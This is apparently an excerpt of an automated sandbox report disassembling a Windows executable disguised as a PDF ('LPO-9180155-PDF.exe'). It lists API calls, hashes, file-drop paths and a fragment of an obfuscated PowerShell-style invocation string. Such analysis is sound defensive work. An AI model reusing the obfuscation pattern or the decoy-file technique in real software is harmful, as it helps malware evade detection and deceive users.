Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: ';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) "$: Completed$A$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes
API String ID: 2246997448-1981434771
Opcode ID: f2a9d0b57340297d45baa60d2932fe1aa1b7a4c7a5e87a3ea4adcdb859a397aa
Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
Opcode Fuzzy Hash: f2a9d0b57340297d45baa60d2932fe1aa1b7a4c7a5e87a3ea4adcdb859a397aa
Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69

Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD

Strings

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 004020F5

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes
API String ID: 542301482-449055245
Opcode ID: 8b26743c023bf28b8b2e00583d47188004e3d905e92f390383a9ff735553564a
Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
Opcode Fuzzy Hash: 8b26743c023bf28b8b2e00583d47188004e3d905e92f390383a9ff735553564a
Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55

Function 0040276E Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
Opcode Fuzzy Hash: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A

Function 004042CA Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
GetDlgItem.USER32(?,000003E8), ref: 0040437C
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
GetSysColor.USER32(?), ref: 004043AA
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
lstrlenW.KERNEL32(?), ref: 004043CB
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
GetDlgItem.USER32(?,0000040A), ref: 00404446
SendMessageW.USER32(00000000), ref: 0040444D
GetDlgItem.USER32(?,000003E8), ref: 00404478
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
SetCursor.USER32(00000000), ref: 004044CC
ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
SetCursor.USER32(00000000), ref: 004044F0
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531

Strings

AB@, xrefs: 004044D6
N, xrefs: 00404466
: Completed, xrefs: 004044A7
open, xrefs: 004044D9

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: : Completed$AB@$N$open
API String ID: 3615053054-1317861079
Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9

Function 00405C06 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425D70,NUL), ref: 00405C16
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43

Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
wsprintfA.USER32 ref: 00405C7E
GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
GlobalFree.KERNEL32(00000000), ref: 00405D6F
CloseHandle.KERNEL32(00000000), ref: 00405D76

Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

Strings

p]B, xrefs: 00405C0B
[Rename], xrefs: 00405CE8, 00405CFA
peB, xrefs: 00405C55
%ls=%ls, xrefs: 00405C74
NUL, xrefs: 00405C10

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %ls=%ls$NUL$[Rename]$p]B$peB
API String ID: 1265525490-3322868524
Opcode ID: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
Opcode Fuzzy Hash: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5

Function 0040617C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\LPO-9180155-PDF.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
CharNextW.USER32(?,?,?,00000000), ref: 004061EE
CharNextW.USER32(?,"C:\Users\user\Desktop\LPO-9180155-PDF.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206

Strings

*?|<>/":, xrefs: 004061CE
C:\Users\user\AppData\Local\Temp\, xrefs: 0040617D, 00406182
"C:\Users\user\Desktop\LPO-9180155-PDF.exe", xrefs: 004061C0

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\LPO-9180155-PDF.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2973593426
Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD

Function 00404194 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004041B1
GetSysColor.USER32(00000000), ref: 004041CD
SetTextColor.GDI32(?,00000000), ref: 004041D9
SetBkMode.GDI32(?,?), ref: 004041E5
GetSysColor.USER32(?), ref: 004041F8
SetBkColor.GDI32(?,?), ref: 00404208
DeleteObject.GDI32(?), ref: 00404222
CreateBrushIndirect.GDI32(?), ref: 0040422C

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25

Function 00402571 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D

Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Strings

9, xrefs: 004025BC

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: File$ByteCharMultiReadWide$Pointerwsprintf
String ID: 9
API String ID: 1149667376-2366072709
Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69

Function 004027B3 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
GlobalFree.KERNEL32(00000000), ref: 00402875
CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9

Function 004024EC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54filestringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 0040252D
lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 00402534
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000000,?,?,00000000,00000011), ref: 00402566

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor, xrefs: 004024F8, 00402519, 00402523, 00402533, 0040255A
8, xrefs: 0040250A

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

